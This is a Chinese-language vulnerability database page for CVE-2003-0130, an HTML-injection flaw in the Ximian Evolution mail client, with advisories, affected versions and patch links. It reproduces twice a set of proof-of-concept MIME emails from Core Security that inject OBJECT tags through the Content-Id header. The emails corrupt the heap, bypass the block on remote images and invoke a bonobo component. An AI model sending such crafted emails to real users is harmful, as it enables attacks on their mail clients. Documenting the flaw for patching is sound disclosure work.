CVE-2003-0130
CVSS5.0
发布时间 :2003-03-24 00:00:00
修订时间 :2016-10-17 22:29:54
NMCOES    

[原文]The handle_image function in mail-format.c for Ximian Evolution Mail User Agent 1.2.2 and earlier does not properly escape HTML characters, which allows remote attackers inject arbitrary data and HTML via a MIME Content-ID header in a MIME-encoded image.


[CNNVD]Ximian Evolution MIME image/* Content-Type数据包含漏洞(CNNVD-200303-072)

        
        Ximian Evolution是个人和工作组信息管理解决方案,可使用在Linux和Unix操作系统下,集成Email、日历、会议安排、联系人管理等。
        Ximian Evolution不正确验证MIME image/* Content-Type字段,远程攻击者可以利用这个漏洞绕过部分安全策略,或处理外部Content-Type类型。
        如果EMAIL信息包含image/* Content-Type字段,任何数据可以嵌入到图象信息中,这可以导致嵌入任何HTML标记,使GTKHtml处理,或调用bonobo组件处理外部Content-Type类型。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:ximian:evolution:1.2
cpe:/a:ximian:evolution:1.0.8
cpe:/a:ximian:evolution:1.0.4
cpe:/a:ximian:evolution:1.2.2
cpe:/a:ximian:evolution:1.0.7
cpe:/a:ximian:evolution:1.0.5
cpe:/a:ximian:evolution:1.0.3
cpe:/a:ximian:evolution:1.2.1
cpe:/a:ximian:evolution:1.0.6
cpe:/a:ximian:evolution:1.1.1

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:111Ximian Evolution MIME-encoded Image Buffer Overflow
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0130
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0130
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200303-072
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0141.html
(UNKNOWN)  BUGTRAQ  20030319 CORE-2003-03-04-01: Multiple vulnerabilities in Ximian 's Evolution Mail User Agent
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000648
(UNKNOWN)  CONECTIVA  CLA-2003:648
http://marc.info/?l=bugtraq&m=104826470527308&w=2
(UNKNOWN)  BUGTRAQ  20030321 GLSA: evolution (200303-18)
http://www.coresecurity.com/common/showdoc.php?idx=309&idxseccion=10
(VENDOR_ADVISORY)  MISC  http://www.coresecurity.com/common/showdoc.php?idx=309&idxseccion=10
http://www.gentoo.org/security/en/glsa/glsa-200303-18.xml
(UNKNOWN)  GENTOO  GLSA-200303-18
http://www.mandriva.com/security/advisories?name=MDKSA-2003:045
(UNKNOWN)  MANDRAKE  MDKSA-2003:045
http://www.redhat.com/support/errata/RHSA-2003-108.html
(UNKNOWN)  REDHAT  RHSA-2003:108
http://www.securityfocus.com/bid/7119
(VENDOR_ADVISORY)  BID  7119

- 漏洞信息

Ximian Evolution MIME image/* Content-Type数据包含漏洞
中危 输入验证
2003-03-24 00:00:00 2005-10-20 00:00:00
远程  
        
        Ximian Evolution是个人和工作组信息管理解决方案,可使用在Linux和Unix操作系统下,集成Email、日历、会议安排、联系人管理等。
        Ximian Evolution不正确验证MIME image/* Content-Type字段,远程攻击者可以利用这个漏洞绕过部分安全策略,或处理外部Content-Type类型。
        如果EMAIL信息包含image/* Content-Type字段,任何数据可以嵌入到图象信息中,这可以导致嵌入任何HTML标记,使GTKHtml处理,或调用bonobo组件处理外部Content-Type类型。
        

- 公告与补丁

        厂商补丁:
        RedHat
        ------
        RedHat已经为此发布了一个安全公告(RHSA-2003:108-01)以及相应补丁:
        RHSA-2003:108-01:Updated Evolution packages fix multiple vulnerabilities
        链接:https://www.redhat.com/support/errata/RHSA-2003-108.html
        补丁下载:
        Red Hat Upgrade evolution-1.0.8-11.i386.rpm
        ftp://updates.redhat.com/8.0/en/os/i386/evolution-1.0.8-11.i386.rpm
        Red Hat Linux 8.0
        Red Hat Upgrade evolution-1.0.8-9.7x.i386.rpm
        ftp://updates.redhat.com/7.3/en/os/i386/evolution-1.0.8-9.7x.i386.rpm
        Red Hat Linux 7.3
        Red Hat Upgrade gal-0.19.2-3.7x.i386.rpm
        ftp://updates.redhat.com/7.3/en/os/i386/gal-0.19.2-3.7x.i386.rpm
        Red Hat Linux 7.3
        Red Hat Upgrade gal-devel-0.19.2-3.7x.i386.rpm
        ftp://updates.redhat.com/7.3/en/os/i386/gal-devel-0.19.2-3.7x.i386.rpm
        Red Hat Linux 7.3
        Red Hat Upgrade libgal19-0.19.2-3.7x.i386.rpm
        ftp://updates.redhat.com/7.3/en/os/i386/libgal19-0.19.2-3.7x.i386.rpm
        Ximian
        ------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载1.2.3版本:
        
        http://www.ximian.com/products/ximian_evolution/

- 漏洞信息 (22371)

Ximian Evolution 1.x MIME image/* Content-Type Data Inclusion Vulnerability (EDBID:22371)
linux remote
2003-03-19 Verified
0 Core Security
N/A [点击下载]
source: http://www.securityfocus.com/bid/7119/info

Ximian Evolution does not properly validate MIME image/* Content-Type fields. If an email message contains an image/* Content-Type, any type of data can be embedded where the image information is expected. This can be used to embed HTML tags that will be rendered by GTKHtml, bypass policies, or invoke bonobo components to handle external content types.

The following example will cause heap corruption:

>From xxx@corest.com Wed Mar 5 14:06:02 2003
Subject: xxx
From: X X. X <xxx@corest.com>
To: xxx@corest.com
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
Message-Id: <1046884154.1731.5.camel@vaiolin>
Mime-Version: 1.0
Date: 05 Mar 2003 14:09:14 -0300

--=-mTDu5zdJIsixETTwCF5Y
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
Content-Id: hello

Hello World!

--=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: attachment; filename=name1.gif
Content-Type: image/gif; name=name1.gif
Content-Id: "><OBJECT classid="cid:hello" type="text/plain"></OBJECT><hr "
Content-Transfer-Encoding: base64

--=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: attachment; filename=name2.gif
Content-Type: image/gif; name=name2.gif
Content-Id: "><OBJECT classid="cid:hello" type="text/plain"></OBJECT><hr "
Content-Transfer-Encoding: base64

--=-mTDu5zdJIsixETTwCF5Y

The following example will bypass the "Don't connect to remote hosts to fetch images" option:

>From xxx@corest.com Wed Mar 5 14:06:02 2003
Subject: xxx
From: X X. X <xxx@corest.com>
To: xxx@corest.com
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
Message-Id: <1046884154.1731.5.camel@vaiolin>
Mime-Version: 1.0
Date: 05 Mar 2003 14:09:14 -0300

--=-mTDu5zdJIsixETTwCF5Y
Content-Type: text/html
Content-Transfer-Encoding: 7bit
Content-Id: apart

<img src="http://external.host.com:anyport">

--=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: attachment; filename=name2.gif
Content-Type: image/gif; name=name2.gif
Content-Id: "><OBJECT classid="cid:apart" type="text/html"></OBJECT><hr "
Content-Transfer-Encoding: base64

--=-mTDu5zdJIsixETTwCF5Y

The following example will cause Evolution to invoke the bonobo-audio-ulaw component:

>From xxx@corest.com Wed Mar 5 14:06:02 2003
Subject: xxx
From: X X. X <xxx@corest.com>
To: xxx@corest.com
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
Message-Id: <1046884154.1731.5.camel@vaiolin>
Mime-Version: 1.0
Date: 05 Mar 2003 14:09:14 -0300

--=-mTDu5zdJIsixETTwCF5Y
Content-Type: audio/ulaw
Content-Transfer-Encoding: 7bit
Content-Id: mysong

There she was, just walking down the street...

--=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: attachment; filename=name2.gif
Content-Type: image/gif; name=name2.gif
Content-Id: "><OBJECT classid="cid:mysong" type="audio/ulaw"></OBJECT><hr "
Content-Transfer-Encoding: base64

--=-mTDu5zdJIsixETTwCF5Y		

- 漏洞信息

13491
Ximian Evolution Mail User Agent handle_image Function Arbitrary Data Injection
Input Manipulation
Loss of Integrity Upgrade
Vendor Verified

- 漏洞描述

- 时间线

2003-03-19 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 1.2.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Ximian Evolution MIME image/* Content-Type Data Inclusion Vulnerability
Input Validation Error 7119
Yes No
2003-03-19 12:00:00 2009-07-11 09:06:00
Discovered by Diego Kelyacoubian, Javier Kohen, Alberto Solino, and Juan Vera of Core Security Technologies.

- 受影响的程序版本

Ximian Evolution 1.2.2
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ RedHat Linux 9.0 i386
Ximian Evolution 1.2.1
Ximian Evolution 1.2
Ximian Evolution 1.1.1
Ximian Evolution 1.0.8
+ Mandriva Linux Mandrake 9.0
Ximian Evolution 1.0.7
Ximian Evolution 1.0.6
Ximian Evolution 1.0.5
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
Ximian Evolution 1.0.4
Ximian Evolution 1.0.3
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ RedHat Linux 7.3
Ximian Evolution 1.2.3

- 不受影响的程序版本

Ximian Evolution 1.2.3

- 漏洞讨论

Ximian Evolution does not properly validate MIME image/* Content-Type fields. If an email message contains an image/* Content-Type, any type of data can be embedded where the image information is expected. This can be used to embed HTML tags that will be rendered by GTKHtml, bypass policies, or invoke bonobo components to handle external content types.

- 漏洞利用

The following example will cause heap corruption:

&gt;From xxx@corest.com Wed Mar 5 14:06:02 2003
Subject: xxx
From: X X. X &lt;xxx@corest.com&gt;
To: xxx@corest.com
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
Message-Id: &lt;1046884154.1731.5.camel@vaiolin&gt;
Mime-Version: 1.0
Date: 05 Mar 2003 14:09:14 -0300

--=-mTDu5zdJIsixETTwCF5Y
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
Content-Id: hello

Hello World!

--=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: attachment; filename=name1.gif
Content-Type: image/gif; name=name1.gif
Content-Id: "&gt;&lt;OBJECT classid="cid:hello" type="text/plain"&gt;&lt;/OBJECT&gt;&lt;hr "
Content-Transfer-Encoding: base64

--=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: attachment; filename=name2.gif
Content-Type: image/gif; name=name2.gif
Content-Id: "&gt;&lt;OBJECT classid="cid:hello" type="text/plain"&gt;&lt;/OBJECT&gt;&lt;hr "
Content-Transfer-Encoding: base64

--=-mTDu5zdJIsixETTwCF5Y

The following example will bypass the "Don't connect to remote hosts to fetch images" option:

&gt;From xxx@corest.com Wed Mar 5 14:06:02 2003
Subject: xxx
From: X X. X &lt;xxx@corest.com&gt;
To: xxx@corest.com
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
Message-Id: &lt;1046884154.1731.5.camel@vaiolin&gt;
Mime-Version: 1.0
Date: 05 Mar 2003 14:09:14 -0300

--=-mTDu5zdJIsixETTwCF5Y
Content-Type: text/html
Content-Transfer-Encoding: 7bit
Content-Id: apart

&lt;img src="http://external.host.com:anyport"&gt;

--=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: attachment; filename=name2.gif
Content-Type: image/gif; name=name2.gif
Content-Id: "&gt;&lt;OBJECT classid="cid:apart" type="text/html"&gt;&lt;/OBJECT&gt;&lt;hr "
Content-Transfer-Encoding: base64

--=-mTDu5zdJIsixETTwCF5Y

The following example will cause Evolution to invoke the bonobo-audio-ulaw component:

&gt;From xxx@corest.com Wed Mar 5 14:06:02 2003
Subject: xxx
From: X X. X &lt;xxx@corest.com&gt;
To: xxx@corest.com
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
Message-Id: &lt;1046884154.1731.5.camel@vaiolin&gt;
Mime-Version: 1.0
Date: 05 Mar 2003 14:09:14 -0300

--=-mTDu5zdJIsixETTwCF5Y
Content-Type: audio/ulaw
Content-Transfer-Encoding: 7bit
Content-Id: mysong

There she was, just walking down the street...

--=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: attachment; filename=name2.gif
Content-Type: image/gif; name=name2.gif
Content-Id: "&gt;&lt;OBJECT classid="cid:mysong" type="audio/ulaw"&gt;&lt;/OBJECT&gt;&lt;hr "
Content-Transfer-Encoding: base64

--=-mTDu5zdJIsixETTwCF5Y

- 解决方案

Red Hat has released a security advisory (RHSA-2003:108-01) which contains fixes for this issue. Users are advised to upgrade as soon as possible.

The appropriate fixes have been applied to the Evolution CVS tree.

Ximian has reported that Evolution 1.2.3 will be released however, it does not appear to be available at this time. Users are advised to monitor the Ximian Evolution release page for further information.

Conectiva Linux has released an advisory. Affected users are advised to upgrade to new versions of Evolution. Further information about obtaining and applying fixes are available in the referenced advisory.


Ximian Evolution 1.0.3

Ximian Evolution 1.0.8

Ximian Evolution 1.2.2

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站